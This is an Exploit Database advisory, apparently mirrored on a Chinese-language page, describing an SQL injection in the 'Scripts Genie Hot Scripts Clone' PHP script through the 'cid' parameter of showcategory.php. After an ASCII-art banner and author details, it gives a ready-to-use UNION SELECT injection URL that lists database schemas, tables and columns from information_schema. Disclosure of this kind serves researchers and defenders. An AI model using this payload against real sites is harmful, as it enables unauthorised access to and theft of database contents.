Scripts Genie Hot Scripts Clone – ‘showcategory.php?cid’ SQL Injection

• Exploit Database
• 103 阅读

• 作者： Easy Laster
  日期： 2013-02-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24516/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  -+=--+=--+=--+=--+=--+=--+=--+=--+=--+=- + Security Flaw+ -+=--+=--+=--+=--+=--+=--+=--+=--+=--+=- + __ _ + + _________ _ _/\ \ \___| |_ + +/ __|/ _ \/ __| | | |/\/ / _ \ __|+ +\__ \__/ (__| |_| / /\/__/ |_ + +|___/\___|\___|\__,_\_\ \/ \___|\__|+ -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+ +Scripts Genie Hot Scripts Clone Script+ +SQL Injection Vulnerability PoC + -+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+ + Discovered by Easy Laster+ +Autor : Easy Laster + + Date :17.02.2013 + +Script:Scripts Genie+ +Hot Scripts Clone Script+ +scriptsgenie.com+ + Price::$1.75 + +Language: PHP + -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-= +Vulnerability + -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-= +hutscripts/showcategory.php?cid=[SQLi]+ -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-= + Proof of Concept + +Crawling the MYSQL Stack+ -+=--+=--+=--+=--+=--+=--+=--+=--+=--+-= /hutscripts/showcategory.php?cid=21+uni on+select+1,concat_ws(0x3a,table_schema ,table_name,column_name),3,4,5+from+inf ormation_schema.columns+limit+180,1--+